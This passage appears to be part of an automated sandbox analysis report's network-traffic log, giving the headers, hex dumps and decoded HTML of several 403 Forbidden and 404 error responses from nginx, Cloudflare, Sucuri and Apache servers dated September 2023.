6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:28 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: 4cc1a01c-bcb7-4d8e-a7c3-39f90276b04bCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BNs6eDN0hc0MFViCDpTH4ZfgoLqjfBy9cUtcTvsiITQ9eIteIGuyOBVQl0cMErlXwdyDFzmomBMepXd9b20mRX9AhwCg1fP5usXxP0oXrNeDts60XK5VKqxTDTly%2BRI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=83.999872Server: cloudflareCF-RAY: 806e75f34f751780-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:27:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:29 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: gA80FevHVPkqWbM+n6rDB7HuI3gDK9u/M1Am1WiJrag=,m0j2EEknGIVUW/liY8BLLqMQhUjPXFZZ6QMfhZ0ZUmYa0sM5c8dDUFHeNaFq0qDuX-Wix-Request-Id: 1694755650.6767642918813131593X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:02 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oF4hfRcmk06De9WzQgjJtH5kqJopafI25ziA6uIguyDTyYQo1YLn71KrlMIDFK5iuRp10QqdLT5dygi0h1CxNPL7oUVJFlwjLj69hWTSWkXyswE7XTiXgdoFwHAgE8Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7602afaf4225-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:32 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
